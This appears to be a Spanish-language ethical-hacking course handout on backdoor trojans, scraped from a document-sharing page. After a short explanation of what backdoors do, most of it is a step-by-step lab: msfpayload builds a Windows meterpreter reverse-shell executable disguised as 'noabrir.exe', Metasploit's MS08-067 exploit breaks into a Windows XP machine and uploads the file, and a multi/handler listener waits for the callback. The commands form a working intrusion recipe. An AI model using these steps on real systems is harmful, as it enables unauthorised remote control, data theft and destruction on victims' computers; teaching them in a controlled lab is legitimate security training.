Está en la página 1de 3

FUNDAMENTOS DE SEGURIDAD Y HACKING ETICO

Profesor: Luis Alfonso Jiménez Piedrahita

Backdoor
Puertas Traseras

Hoy en día, las puertas traseras son el tipo de troyanos más peligroso y difundido. Estos troyanos son utilitarios de
administración remota que someten los equipos infectados a un control externo por medio de la red local o Internet. Su
forma de funcionamiento es similar a la de los programas de administración remota (a distancia) usados por los
administradores de sistemas. Esto hace que sea difícil detectarlos.

La única diferencia entre una herramienta de administración legal y una puerta trasera es que éstas se instalan sin que el
usuario lo sepa y sin su consentimiento. Cuando la puerta trasera es ejecutada, empieza a monitorear el sistema local sin
que el usuario lo note. Con frecuencia la puerta trasera no figura en el log de los programas activos.

Una vez que un utilitario de administración a distancia se instala y ejecuta, el equipo de la víctima queda a disposición del
agresor. Las puertas traseras pueden:

 Enviar y recibir archivos


 Activar y eliminar archivos
 Ejecutar archivos
 Mostrar notificaciones
 Borrar datos
 Reiniciar el computador

En otras palabras, los autores de virus usan las puertas traseras para detectar y bajar información confidencial, ejecutar
código malicioso, destruir datos, incluir el computador en redes bot, etc. En resumen, las puertas traseras combinan la
funcionalidad de la mayoría de tipos de troyanos en un solo paquete.

Las puertas traseras tienen una subclase particularmente peligrosa: las variantes que pueden propagarse como gusanos. La
única diferencia es que los gusanos están programados para propagarse constantemente, en tanto que las puertas traseras
móviles se propagan únicamente al recibir una instrucción específica de su "amo".

Generar Backdoors desde BackTrack

1. Abrimos una ventana de terminal en Backtrack.

2. Escribimos el siguiente código en la consola

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.100.100 LPORT=4444 x > noabrir.exe

Con lo anterior estamos creando un archive llamado noabrir.exe con los datos de mi BackTrack, de tal manera que cuando el objetivo (victima)
ejecute el archivo, nos envíe la información del pc. El resultado lo vemos en la siguiente pantalla.
FUNDAMENTOS DE SEGURIDAD Y HACKING ETICO
Profesor: Luis Alfonso Jiménez Piedrahita

Este archivo queda almacenado en el /root.

Inyección del BackDoor al Objetivo (Victima)

Después de crear el BackDoor, se procede a pasarle al objetivo este archivo y colocarlo en una parte del pc de tal forma que se vea y lo ejecute en
cualquier momento…

Para efectos del ejercicio, realizaremos una intrusión a Windows XP y colocaremos este archivo en el escritorio para ser ejecutado posteriormente.

Proceso:

1. msfconsole
2. use exploit/windows/smb/ms08_067_netapi
3. set rhost 192.168.100.200
4. set rport 445
5. set lhost 192.168.100.100
6. set payload windows/meterpreter/reverse_tcp
7. exploit
8. upload noabrir.exe C:\\”Documents and Settings”\\Administrador\\Escritorio

Ejecutar el Exploit

Luego de pasar el archivo al Objetivo (victima), procedemos a ejecutar el Exploit que nos va a permitir capturar los datos del pc cuando se ejecute el
archivo.
FUNDAMENTOS DE SEGURIDAD Y HACKING ETICO
Profesor: Luis Alfonso Jiménez Piedrahita

use exploit/multi/handler y ENTER.


set LHOST 192.168.100.100 y ENTER.
set LPORT 4444 y ENTER.
exploit

Ejecución del Archivo por parte del Objetivo (Victima)

Lo único que no falta es que el Objetivo ejecute el archivo y si no hay ningún inconveniente, nos dará una conexión meterpreter al objetivo.

Con esto ya tenemos acceso al objetivo y podemos realizar lo que se necesite realizar en este equipo…

Muchos Éxitos

También podría gustarte